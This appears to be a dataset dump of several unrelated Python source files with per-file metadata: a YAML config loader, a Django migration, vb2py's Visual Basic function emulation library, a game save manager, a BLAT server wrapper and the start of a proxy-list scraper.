] | 1 | 2018-05-20T17:04:48.000Z | 2018-05-20T17:04:48.000Z | from jinja2 import Environment, FileSystemLoader, Template, TemplateNotFound
import collections
import os
import yaml
from os.path import dirname, basename
from .env import environ
from ..log import logger
def reader(fn):
logger.debug('loading', f=fn)
try:
tmplenv = Environment(loader=FileSystemLoader(dirname(fn)))
tmpl = tmplenv.get_template(str(basename(fn)))
part = tmpl.render(**environ)
data = yaml.load(part)
return data
except TemplateNotFound:
logger.warn('Template not found', file=fn)
except Exception:
logger.exception('config')
| 28 | 76 | 0.696429 | 73 | 616 | 5.863014 | 0.561644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002049 | 0.207792 | 616 | 21 | 77 | 29.333333 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0.050407 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.368421 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
776a43d738bc9faab56761683d2b178a96cf6d30 | 655 | py | Python | pastebin/migrations/0006_auto_20170129_1502.py | johannessarpola/django-pastebin | fccc396ad4532906ac7cb0e1343c341fceb65b14 | [
"MIT"
] | null | null | null | pastebin/migrations/0006_auto_20170129_1502.py | johannessarpola/django-pastebin | fccc396ad4532906ac7cb0e1343c341fceb65b14 | [
"MIT"
] | null | null | null | pastebin/migrations/0006_auto_20170129_1502.py | johannessarpola/django-pastebin | fccc396ad4532906ac7cb0e1343c341fceb65b14 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11a1 on 2017-01-29 15:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pastebin', '0005_auto_20170129_1333'),
]
operations = [
migrations.AlterField(
model_name='paste',
name='creation_date',
field=models.DateTimeField(verbose_name='creation date'),
),
migrations.AlterField(
model_name='paste',
name='expiry_date',
field=models.DateTimeField(verbose_name='expiration date'),
),
]
| 25.192308 | 71 | 0.61374 | 66 | 655 | 5.878788 | 0.636364 | 0.103093 | 0.128866 | 0.149485 | 0.396907 | 0.396907 | 0 | 0 | 0 | 0 | 0 | 0.069328 | 0.273282 | 655 | 25 | 72 | 26.2 | 0.745798 | 0.103817 | 0 | 0.333333 | 1 | 0 | 0.159247 | 0.039384 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
776ab60110d0cc5f95a05461c25be9b7a11b0d17 | 23,202 | py | Python | vb2py/vbfunctions.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 2 | 2015-12-01T10:52:36.000Z | 2021-04-20T05:15:01.000Z | vb2py/vbfunctions.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 4 | 2016-07-18T18:28:24.000Z | 2016-07-19T08:30:14.000Z | vb2py/vbfunctions.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 3 | 2015-07-15T21:08:19.000Z | 2021-02-25T09:39:12.000Z | """
Functions to mimic VB intrinsic functions or things
"""
from __future__ import generators
from vb2py.vbclasses import *
from vb2py.vbconstants import *
from vb2py import utils
from vb2py import config
import math
import sys
import fnmatch # For Like
import glob # For Dir
import os
import shutil # For FileCopy
import random # For Rnd, Randomize
import time # For timing
import inspect
import new
# << Error classes >>
class VB2PYCodeError(Exception): """An error occured executing a vb2py function"""
class VB2PYNotSupported(VB2PYCodeError): """The requested function is not supported"""
class VB2PYFileError(VB2PYCodeError): """Some kind of file error"""
class VB2PYEndOfFile(VB2PYFileError): """Reached the end of file"""
# -- end -- << Error classes >>
# << VBFunctions >> (1 of 57)
def Array(*args):
"""Create an array from our arguments"""
array = VBArray(len(args)-1, Variant)
for idx in range(len(args)):
array[idx] = args[idx]
return array
# << VBFunctions >> (2 of 57)
def CBool(num):
"""Return the boolean version of a number"""
n = float(num)
if n:
return 1
else:
return 0
# << VBFunctions >> (3 of 57)
def Choose(index, *args):
"""Choose from a list of options
If the index is out of range then we return None. The list is
indexed from 1.
"""
if index <= 0:
return None
try:
return args[index-1]
except IndexError:
return None
# << VBFunctions >> (4 of 57)
def CreateObject(classname, ipaddress=None):
"""Try to create an OLE object
This only works on windows!
"""
if ipaddress:
raise VB2PYNotSupported("DCOM not supported")
import win32com.client
return win32com.client.Dispatch(classname)
# << VBFunctions >> (5 of 57)
_last_files = []
def Dir(path=None):
"""Recursively return the contents of a path matching a certain pattern
The complicating part here is that when you first call Dir it return the
first file. Subsequent calls to Dir with no parameters return the other
files. When all the files are exhausted, we return an empty string.
Since we need to remember the original path we have to use a global variable
which is a bit ugly.
"""
global _last_files
if path:
path = VBFiles.fixSeparators(path)
_last_files = glob.glob(path)
if _last_files:
return os.path.split(_last_files.pop(0))[1] # VB just returns the filename, not full path
else:
return ""
# << VBFunctions >> (6 of 57)
def Environ(envstring):
"""Return the String associated with an operating system environment variable
envstring Optional. String expression containing the name of an environment variable.
number Optional. Numeric expression corresponding to the numeric order of the
environment string in the environment-string table. The number argument can be any
numeric expression, but is rounded to a whole number before it is evaluated.
Remarks
If envstring can't be found in the environment-string table, a zero-length string ("")
is returned. Otherwise, Environ returns the text assigned to the specified envstring;
that is, the text following the equal sign (=) in the environment-string table for that environment variable.
"""
try:
envint = int(envstring)
except ValueError:
return os.environ.get(envstring, "")
# Is an integer - need to get the envint'th value
try:
return "%s=%s" % (os.environ.keys()[envint], os.environ.values()[envint])
except IndexError:
return ""
# << VBFunctions >> (7 of 57)
def Erase(*args):
"""Erase the contents of fixed size arrays and return them to their initialized form"""
for array in args:
array.erase()
# << VBFunctions >> (8 of 57)
def EOF(channel):
"""Determine if we reached the end of file for the particular channel"""
return VBFiles.EOF(channel)
# << VBFunctions >> (9 of 57)
def FileLen(filename):
"""Return the length of a given file"""
return os.stat(str(VBFiles.fixSeparators(filename)))[6]
# << VBFunctions >> (10 of 57)
def Filter(sourcesarray, match, include=1):
"""Returns a zero-based array containing subset of a string array based on a specified filter criteria"""
if include:
return Array(*[item for item in sourcesarray if item.find(match) > -1])
else:
return Array(*[item for item in sourcesarray if item.find(match) == -1])
# << VBFunctions >> (11 of 57)
def FreeFile():
"""Return the next available channel number"""
existing = VBFiles.getOpenChannels()
if existing:
return max(existing)+1
else:
return 1
# << VBFunctions >> (12 of 57)
def Hex(num):
"""Return the hex of a value"""
return hex(CInt(num))[2:].upper()
# << VBFunctions >> (13 of 57)
def IIf(cond, truepart, falsepart):
"""Conditional operator"""
if cond:
return truepart
else:
return falsepart
# << VBFunctions >> (14 of 57)
def Input(length, channelid):
"""Return the given number of characters from the given channel"""
return VBFiles.getChars(channelid, length)
# << VBFunctions >> (15 of 57)
def InStr(*args):
"""Return the location of one string in another"""
if len(args) == 2:
text, subtext = args
return text.find(subtext)+1
else:
start, text, subtext = args
pos = text[start-1:].find(subtext)
if pos == -1:
return 0
else:
return pos + start
# << VBFunctions >> (16 of 57)
def InStrRev(text, subtext, start=None, compare=None):
"""Return the location of one string in another starting from the end"""
assert compare is None, "Compare modes not allowed for InStrRev"
if start is None:
start = len(text)
if subtext == "":
return len(text)
elif start > len(text):
return 0
else:
return text[:start].rfind(subtext)+1
# << VBFunctions >> (17 of 57)
def Int(num):
"""Return the int of a value"""
n = float(num)
if -32767 <= n <= 32767:
return int(n)
else:
raise ValueError("Out of range in Int (%s)" % n)
def CByte(num):
"""Return the closest byte of a value"""
n = round(float(num))
if 0 <= n <= 255:
return int(n)
else:
raise ValueError("Out of range in CByte (%s)" % n)
def CInt(num):
"""Return the closest int of a value"""
n = round(float(num))
if -32767 <= n <= 32767:
return int(n)
else:
raise ValueError("Out of range in Int (%s)" % n)
def CLng(num):
"""Return the closest long of a value"""
return long(round(float(num)))
# << VBFunctions >> (18 of 57)
def IsArray(obj):
"""Determine if an object is an array"""
return isinstance(obj, (list, tuple))
# << VBFunctions >> (19 of 57)
def IsNumeric(text):
"""Return true if the string contains a valid number"""
try:
dummy = float(text)
except ValueError:
return 0
else:
return 1
# << VBFunctions >> (20 of 57)
def Join(sourcearray, delimeter=" "):
"""Join a list of strings"""
s_list = map(str, sourcearray)
return delimeter.join(s_list)
# << VBFunctions >> (21 of 57)
def LCase(text):
"""Return the lower case version of a string"""
return text.lower()
def UCase(text):
"""Return the lower case version of a string"""
return text.upper()
# << VBFunctions >> (22 of 57)
def Left(text, number):
"""Return the left most characters in the text"""
return text[:number]
# << VBFunctions >> (23 of 57)
def Like(text, pattern):
"""Return true if the text matches the pattern
The pattern is a string containing wildcards
* = any string of characters
? = any one character
Fortunately, the fnmatch library module does this for us!
"""
return fnmatch.fnmatch(text, pattern)
# << VBFunctions >> (24 of 57)
from PythonCard.graphic import Bitmap
def LoadPicture(filename):
"""Load an image as a bitmap for display in a BitmapImage control"""
return Bitmap(filename)
# << VBFunctions >> (25 of 57)
def Lof(channel):
"""Return the length of an open"""
return FileLen(VBFiles.getFile(channel).name)
# << VBFunctions >> (26 of 57)
def Log(num):
"""Return the log of a value"""
return math.log(float(num))
def Exp(num):
"""Return the log of a value"""
return math.exp(float(num))
# << VBFunctions >> (27 of 57)
def LSet(var, value):
"""Do a VB LSet
Left aligns a string within a string variable, or copies a variable of one
user-defined type to another variable of a different user-defined type.
LSet stringvar = string
LSet replaces any leftover characters in stringvar with spaces.
If string is longer than stringvar, LSet places only the leftmost characters,
up to the length of the stringvar, in stringvar.
Warning Using LSet to copy a variable of one user-defined type into a
variable of a different user-defined type is not recommended. Copying data
of one data type into space reserved for a different data type can cause unpredictable results.
When you copy a variable from one user-defined type to another, the binary data
from one variable is copied into the memory space of the other, without regard
for the data types specified for the elements.
"""
return value[:len(var)] + " "*(len(var)-len(value))
# << VBFunctions >> (28 of 57)
def MakeDate(*args):
"""Return a date from the given string"""
raise NotImplementedError("MakeDate has not been written yet")
# << VBFunctions >> (29 of 57)
def Mid(text, start, num=None):
"""Return some characters from the text"""
if num is None:
return text[start-1:]
else:
return text[(start-1):(start+num-1)]
# << VBFunctions >> (30 of 57)
def Oct(num):
"""Return the oct of a value"""
n = CInt(num)
if n == 0:
return "0"
else:
return oct(n)[1:]
# << VBFunctions >> (31 of 57)
def RGB(r, g, b):
"""Return a Long whole number representing an RGB color value
The value for any argument to RGB that exceeds 255 is assumed to be 255.
If any argument is less than zero then this results in a ValueError.
"""
rm = min(255, Int(r))
gm = min(255, Int(g))
bm = min(255, Int(b))
#
if rm < 0 or gm < 0 or bm < 0:
raise ValueError("RGB values must be >= 0, were (%s, %s, %s)" % (r, g, b))
#
return ((bm*256)+gm)*256+rm
# << VBFunctions >> (32 of 57)
def Replace(expression, find, replace, start=1, count=-1):
"""Returns a string in which a specified substring has been replaced with another substring a specified number of times
The return value of the Replace function is a string, with substitutions made,
that begins at the position specified by start and and concludes at the end of
the expression string. It is not a copy of the original string from start to finish.
"""
if find:
return expression[:start-1] + expression[start-1:].replace(find, replace, count)
else:
return expression
# << VBFunctions >> (33 of 57)
def Right(text, number):
"""Return the right most characters in the text"""
return text[-number:]
# << VBFunctions >> (34 of 57)
_last_rnd_number = random.random()
def Rnd(value=1):
"""Return a random numer and optionally seed the current state"""
global _last_rnd_number
if value == 0:
return _last_rnd_number
elif value < 0:
random.seed(value)
r = random.random()
_last_rnd_number = r
return r
def Randomize(seed=None):
"""Seed the RNG
In VB this doesn't return a consistent sequence so we basically ignore the seed.
"""
random.seed()
# << VBFunctions >> (35 of 57)
def RSet(var, value):
"""Do a VB RSet
Right aligns a string within a string variable.
RSet stringvar = string
If stringvar is longer than string, RSet replaces any leftover characters
in stringvar with spaces, back to its beginning.
"""
return " "*(len(var)-len(value)) + value[:len(var)]
# << VBFunctions >> (36 of 57)
def Seek(channel):
"""Return the current 'cursor' position in the specified channel"""
return VBFiles.getFile(Int(channel)).tell()+1 # VB starts at 1
# << VBFunctions >> (37 of 57)
class _OptionsDB(config.VB2PYConfigObject):
"""A special config parser class to handle central VB options"""
def __init__(self, appname):
"""Initialize the parser"""
config.VB2PYConfigObject.__init__(self, filename=utils.relativePath("settings.ini"))
self.appname = appname
def __getitem__(self, key):
"""Get an item"""
section, name = key
section = self._getSettingName(section)
return config.VB2PYConfigObject.__getitem__(self, (section, name))
def __setitem__(self, key, value):
"""Set an item"""
section, name = key
section = self._getSettingName(section)
if not self._config.has_section(section):
self._config.add_section(section)
self._config.set(section, name, value)
self.save()
def save(self):
"""Store the options"""
f = open(utils.relativePath("settings.ini"), "w")
self._config.write(f)
f.close()
def _getSettingName(self, section):
"""Return the name for a section"""
return "%s.%s" % (self.appname, section)
def getAll(self, section):
"""Return all the items in a sections"""
thissection = self._getSettingName(section)
options = self._config.options(thissection)
ret = vbObjectInitialize(size=(len(options)-1, 1), objtype=str)
for idx in range(len(options)):
ret[idx, 0] = options[idx]
ret[idx, 1] = self[section, options[idx]]
return ret
def delete(self, section, name):
"""Delete a setting from the settings file"""
section = self._getSettingName(section)
self._config.remove_option(section, name)
self.save()
# << VBFunctions >> (38 of 57)
def GetSetting(appname, section, key, default=None):
"""Get a setting from the central setting file"""
settings = _OptionsDB(appname)
try:
return settings[section, key]
except config.ConfigParser.Error:
if default is not None:
return default
raise
# << VBFunctions >> (39 of 57)
def GetAllSettings(appname, section):
"""Get all settings from the central setting file"""
settings = _OptionsDB(appname)
return settings.getAll(section)
# << VBFunctions >> (40 of 57)
def SaveSetting(appname, section, key, value):
"""Set a setting in the central setting file"""
settings = _OptionsDB(appname)
settings[section, key] = str(value)
# << VBFunctions >> (41 of 57)
def DeleteSetting(appname, section, key):
"""Delete a setting in the central setting file"""
settings = _OptionsDB(appname)
settings.delete(section, key)
# << VBFunctions >> (42 of 57)
def Sgn(num):
"""Return the sign of a number"""
n = float(num)
if n < 0:
return -1
elif n == 0:
return 0
else:
return 1
# << VBFunctions >> (43 of 57)
def String(num=None, text=None):
"""Return a repeated number of string items"""
if num is None and text is None:
return str()
else:
return text[:1]*CInt(num)
def Space(num):
"""Return a repeated number of spaces"""
return String(num, " ")
Spc = Space
# << VBFunctions >> (44 of 57)
def Split(text, delimiter=" ", limit=-1, compare=None):
"""Split a string using the delimiter
If the optional limit is present then this defines the number
of items returned. The compare is used for different string comparison
types in VB, but this is not implemented at the moment
"""
if compare is not None:
raise VB2PYNotSupported("Compare options for Split are not currently supported")
#
if limit == 0:
return VBArray()
elif limit > 0:
return Array(*str(text).split(delimiter, limit-1))
else:
return Array(*str(text).split(delimiter))
# << VBFunctions >> (45 of 57)
def Sqr(num):
"""Return the square root of a value"""
return math.sqrt(float(num))
def Sin(num):
"""Return the sin of a value"""
return math.sin(float(num))
def Cos(num):
"""Return the cosine of a value"""
return math.cos(float(num))
def Tan(num):
"""Return the tangent of a value"""
return math.tan(float(num))
def Atn(num):
"""Return the arc-tangent of a value"""
return math.atan(float(num))
# << VBFunctions >> (46 of 57)
def StrReverse(s):
"""Reverse a string"""
l = list(str(s))
l.reverse()
return "".join(l)
# << VBFunctions >> (47 of 57)
def Switch(*args):
"""Choose from a list of expression each with its own condition
The arguments are presented as a sequence of condition, expression pairs
and the first condition that returns a true causes its expression to be
returned. If no conditions are true then the function returns None
"""
arg_list = list(args)
arg_list.reverse()
#
while arg_list:
cond, expr = arg_list.pop(), arg_list.pop()
if cond:
return expr
return None
# << VBFunctions >> (48 of 57)
def Timer():
"""Returns a Single representing the number of seconds elapsed since midnight"""
ltime = time.localtime()
h, m, s = ltime[3:6]
return h*3600.0 + m*60.0 + s
# << VBFunctions >> (49 of 57)
def Trim(text):
"""Strip spaces from the text"""
return str(text).strip()
def LTrim(text):
"""Strip spaces from the left of the text"""
return str(text).lstrip()
def RTrim(text):
"""Strip spaces from the right of the text"""
return str(text).rstrip()
# << VBFunctions >> (50 of 57)
def UBound(obj, dimension=1):
"""Return the upper bound for the index"""
try:
return obj.__ubound__(dimension)
except AttributeError:
raise ValueError("UBound called for invalid object")
def LBound(obj, dimension=1):
"""Return the lower bound for the index"""
try:
return obj.__lbound__(dimension)
except AttributeError:
raise ValueError("LBound called for invalid object")
# << VBFunctions >> (51 of 57)
def Val(text):
"""Return the value of a string
This function finds the longest leftmost number in the string and
returns it. If there are no valid numbers then it returns 0.
The method chosen here is very poor - we just keep trying to convert the
string to a float and just use the last successful as we increase
the size of the string. A Regular expression approach is probably
quicker.
"""
best = 0
for idx in range(len(text)):
try:
best = float(text[:idx+1])
except ValueError:
pass
return best
# << VBFunctions >> (52 of 57)
def vbForRange(start, stop, step=1):
"""Mimic the range in a for statement
VB's range is inclusive and can include non-integer elements so
we use an generator.
"""
num_repeats = (stop-start)/step
if num_repeats < 0:
raise StopIteration
current = start
while num_repeats >= 0:
yield current
current += step
num_repeats -= 1
# << VBFunctions >> (53 of 57)
def vbGetEventArgs(names, arguments):
"""Return arguments passed in an event
VB Control events have parameters passed in the call, eg MouseMove(Button, Shift, X, Y).
In PythonCard the event parameters are all passed as a single event object. We
can easily unpack the attributes back to the values in the Event Handler but
we also have to account for the fact that someone might call the Handler
directly and therefore assume that they can pass parameters individually.
This function tries to unpack the params from an event object and, if
successful, returns them as a tuple. If this fails then it tries to
assume that they were already in a tuple and return them that way.
This can still fail if there are keyword arguments ... TODO!
"""
# arguments is the *args tuple
#
# Is there only one parameter
if len(arguments) == 1:
# Try to unpack names from this argument
try:
ret = []
for name in names:
if name.endswith("()"):
ret.append(getattr(arguments[0], name[:-2])())
else:
ret.append(getattr(arguments[0], name))
return ret
except AttributeError:
pass
# If we have as many arguments as we need then just return them
if len(names) == len(arguments):
return arguments
# Couldn't unpack the event and didn't have the right number of args so we are dead
raise VB2PYCodeError("EventHandler couldn't unpack arguments")
# << VBFunctions >> (54 of 57)
class VBMissingArgument:
"""A generic class to represent an argument omitted from a call"""
_missing = 1
# << VBFunctions >> (55 of 57)
def VBGetMissingArgument(fn, argument_index):
"""Return the default value for a particular argument of a function"""
try:
args, varargs, varkw, defaults = inspect.getargspec(fn)
except Exception, err:
raise VB2PYCodeError("Unable to determine default argument for arg %d of %s: %s" % (
argument_index, fn, err))
#
# Find correct argument default
offset = argument_index - len(args)
#
# If this is an instancemethod then we must skip the 'self' argument
if isinstance(fn, new.instancemethod):
offset += 1
try:
return defaults[offset]
except IndexError:
raise VB2PYCodeError("Default argument for arg %d of %s doesn't seem to exist" % (
argument_index, fn))
# << VBFunctions >> (56 of 57)
def vbObjectInitialize(size=None, objtype=None, preserve=None):
"""Return a new object with the given size and type"""
if size is None:
size = [0]
#
# Create the object
def getObj():
if len(size) == 1:
return objtype()
else:
return vbObjectInitialize(size[1:], objtype)
ret = VBArray(size[0], getObj)
#
# Preserve the old values if needed
if preserve is not None:
preserve.__copyto__(ret)
return ret
# << VBFunctions >> (57 of 57)
Abs = abs
Asc = AscB = AscW = ord
Chr = ChrB = ChrW = chr
Fix = Int
CStr = Str = str
CSng = CDbl = float
Len = len
StrComp = cmp
Round = round
True = 1
False = 0
#
# Command line parameters are retrieved as a whole
Command = " ".join(sys.argv[1:])
#
# File stuff
#
def Kill(path):
os.remove(VBFiles.fixSeparators(path))
def RmDir(path):
os.rmdir(VBFiles.fixSeparators(path))
def MkDir(path):
os.mkdir(VBFiles.fixSeparators(path))
def ChDir(path):
os.chdir(VBFiles.fixSeparators(path))
def FileCopy(fromPath, toPath):
fromPath = VBFiles.fixSeparators(fromPath)
toPath = VBFiles.fixSeparators(toPath)
shutil.copyfile(fromPath, toPath)
def Name(path, asPath):
path = VBFiles.fixSeparators(path)
asPath = VBFiles.fixSeparators(asPath)
os.rename(path, asPath)
| 31.269542 | 123 | 0.64572 | 3,209 | 23,202 | 4.639763 | 0.217513 | 0.015313 | 0.023977 | 0.008463 | 0.15723 | 0.121298 | 0.096111 | 0.075828 | 0.052186 | 0.034052 | 0 | 0.021596 | 0.247608 | 23,202 | 741 | 124 | 31.311741 | 0.8313 | 0.099517 | 0 | 0.210784 | 0 | 0 | 0.050841 | 0 | 0 | 0 | 0 | 0.00135 | 0.002451 | 0 | null | null | 0.004902 | 0.041667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
776e19a406580ffe1c88612e6f292579a2edbc26 | 3,227 | py | Python | qrogue/management/save_data.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | 4 | 2021-12-14T19:13:43.000Z | 2022-02-16T13:25:38.000Z | qrogue/management/save_data.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | null | null | null | qrogue/management/save_data.py | 7Magic7Mike7/Qrogue | 70bd5671a77981c1d4b633246321ba44f13c21ff | [
"MIT"
] | 1 | 2022-01-04T18:35:51.000Z | 2022-01-04T18:35:51.000Z |
from qrogue.game.logic.actors import Player, Robot
from qrogue.game.logic.actors.controllables import TestBot, LukeBot
from qrogue.game.world.map import CallbackPack
from qrogue.util import Logger, PathConfig, AchievementManager, RandomManager, CommonPopups, CheatConfig
from qrogue.util.achievements import Achievement
class SaveData:
__ROBOT_SECTION = "[Robots]"
__COLLECTIBLE_SECTION = "[Collectibles]"
__ACHIEVEMENT_SECTION = "[Achievements]"
__instance = None
@staticmethod
def instance() -> "SaveData":
if SaveData.__instance is None:
Logger.instance().throw(Exception("This singleton has not been initialized yet!"))
return SaveData.__instance
@staticmethod
def __empty_save_file() -> str:
pass
def __init__(self):
if SaveData.__instance is not None:
Logger.instance().throw(Exception("This class is a singleton!"))
else:
self.__player = Player()
path = PathConfig.find_latest_save_file()
content = ""
try:
content = PathConfig.read(path, in_user_path=True).splitlines()
except FileNotFoundError:
Logger.instance().error(NotImplementedError("This line should not be reachable! Please send us the log "
"files so we can fix the issue as soon as possible. "
"Thank you!"))
index = content.index(SaveData.__ACHIEVEMENT_SECTION)
achievement_list = []
for i in range(index + 1, len(content)):
achievement = Achievement.from_string(content[i])
if achievement:
achievement_list.append(achievement)
self.__achievements = AchievementManager(achievement_list)
self.__available_robots = [
TestBot(CallbackPack.instance().game_over),
LukeBot(CallbackPack.instance().game_over),
]
SaveData.__instance = self
@property
def achievement_manager(self) -> AchievementManager:
return self.__achievements
@property
def player(self) -> Player:
return self.__player
def get_expedition_seed(self) -> int:
return RandomManager.instance().get_seed(msg="SaveData.get_expedition_seed()") #7 # todo implement
def available_robots(self) -> iter:
return iter(self.__available_robots)
def get_robot(self, index: int) -> Robot:
if 0 <= index < len(self.__available_robots):
return self.__available_robots[index]
return None
def save(self) -> CommonPopups:
if CheatConfig.did_cheat():
return CommonPopups.NoSavingWithCheats
try:
data = ""
data += f"{SaveData.__ROBOT_SECTION}\n"
data += f"{SaveData.__COLLECTIBLE_SECTION}\n"
data += f"{SaveData.__ACHIEVEMENT_SECTION}\n"
data += f"{self.achievement_manager.to_string()}\n"
PathConfig.new_save_file(data)
return CommonPopups.SavingSuccessful
except:
return CommonPopups.SavingFailed
| 38.416667 | 120 | 0.618531 | 319 | 3,227 | 5.996865 | 0.37931 | 0.026137 | 0.039728 | 0.020387 | 0.085729 | 0.037637 | 0 | 0 | 0 | 0 | 0 | 0.001316 | 0.293771 | 3,227 | 83 | 121 | 38.879518 | 0.838087 | 0.006198 | 0 | 0.085714 | 0 | 0 | 0.124532 | 0.05181 | 0 | 0 | 0 | 0.012048 | 0 | 1 | 0.128571 | false | 0.014286 | 0.071429 | 0.057143 | 0.414286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77787a24c06c5cadf9b989de8250da820c76d334 | 3,317 | py | Python | ulutil/blat.py | churchlab/ulutil | 7f9a427274acd99ae4d2dfe35123feb7c2dc9625 | [
"Apache-2.0"
] | 1 | 2021-10-04T13:50:01.000Z | 2021-10-04T13:50:01.000Z | ulutil/blat.py | churchlab/ulutil | 7f9a427274acd99ae4d2dfe35123feb7c2dc9625 | [
"Apache-2.0"
] | null | null | null | ulutil/blat.py | churchlab/ulutil | 7f9a427274acd99ae4d2dfe35123feb7c2dc9625 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Uri Laserson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# BLAT tools
# based on Sri's code
import sys
import subprocess
import os
import signal
import time
from ulutil import seqtools
hg_idx = '~/genome/hg19.2bit'
def start_gfServer(file2idx=hg_idx,tileSize=11,stepSize=2,minMatch=2,maxGap=4,repMatch=1000000,debug=False):
params = (tileSize,stepSize,minMatch,maxGap,repMatch,file2idx)
cmd = "gfServer start -tileSize=%i -stepSize=%i -minMatch=%i -maxGap=%i -repMatch=%i localhost 17779 %s" % params
if debug: print "Command is:\n%s" % cmd
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE)
time.sleep(660)
print "Finished starting up BLAT server (hopefully)."
return p
def is_server_running():
p = subprocess.Popen('ps -A',shell=True,stdout=subprocess.PIPE)
lines = p.stdout.readlines()
for line in lines:
if 'gfServer' in line:
return True
return False
def stop_gfServer(p=None):
if p != None:
os.kill(p.pid,signal.SIGTERM)
time.sleep(5)
else:
pids = []
p = subprocess.Popen('ps -A',shell=True,stdout=subprocess.PIPE)
lines = p.stdout.readlines()
for line in lines:
if 'gfServer' in line:
pids.append(int(line.split()[0]))
for pid in pids:
os.kill(pid,signal.SIGTERM)
time.sleep(5)
# HACK/BUG: for some reason gfClient is doubling the directory prefix. It works if
# file2idx='/'
# def search_sequences(seqs,file2idx=hg_idx,minScore=20,minIdentity=70,debug=False):
def search_sequences(seqs,file2idx='/',minScore=15,minIdentity=70,debug=False):
if not is_server_running():
raise RuntimeError, "BLAT server not running."
# generate query
if hasattr(seqs[0],'format'):
query = ''.join([s.format('fasta') for s in seqs])
else:
query = ''.join(['>query%i\n%s\n' % (i,s) for (i,s) in enumerate(seqs)])
# define and run command
nibdir = os.path.dirname(file2idx)
params = (minScore,minIdentity,nibdir)
cmd = "gfClient -minScore=%i -minIdentity=%i -nohead localhost 17779 %s /dev/stdin /dev/stdout" % params
if debug: print cmd
p = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
p.stdin.write( query )
p.stdin.close()
# process output
num = 0
for line in p.stdout:
if debug: print line
if line == "Output is in /dev/stdout\n":
continue
num += 1
return num
# HACK/BUG: for some reason gfClient is doubling the directory prefix. It works if
# file2idx='/'
def search_sequence(seq,file2idx='/',minScore=15,minIdentity=50,debug=False):
return search_sequences([seq],file2idx,minScore,minIdentity,debug)
| 34.552083 | 117 | 0.669279 | 469 | 3,317 | 4.705757 | 0.385928 | 0.027186 | 0.028999 | 0.033983 | 0.247848 | 0.215677 | 0.192116 | 0.164024 | 0.164024 | 0.164024 | 0 | 0.024212 | 0.215556 | 3,317 | 95 | 118 | 34.915789 | 0.823982 | 0.279168 | 0 | 0.20339 | 0 | 0.033898 | 0.153781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.101695 | null | null | 0.067797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
777afd3d3324ad331c8330a1ce08d5445f8f7120 | 1,064 | py | Python | source/win.py | TwinIsland/WPN | b0f42ff5c3fdad80830ebca1e39254b14ddd5929 | [
"MIT"
] | null | null | null | source/win.py | TwinIsland/WPN | b0f42ff5c3fdad80830ebca1e39254b14ddd5929 | [
"MIT"
] | null | null | null | source/win.py | TwinIsland/WPN | b0f42ff5c3fdad80830ebca1e39254b14ddd5929 | [
"MIT"
] | null | null | null | import requests
import lxml.etree
def getSS(crawler):
api = 'https://www.youneed.win/free-ss'
c = lxml.etree.HTML(requests.get(api,headers=crawler.get_crawel_header(),proxies=crawler.get_an_ip()).content)
r = []
count = 0
while True:
count += 1
# //*[@id="post-box"]/div/section/table/tbody/tr[1]/td[1]
xpathIP = '//*[@id="post-box"]/div/section/table/tbody/tr[' + str(count) + ']/td[1]/text()'
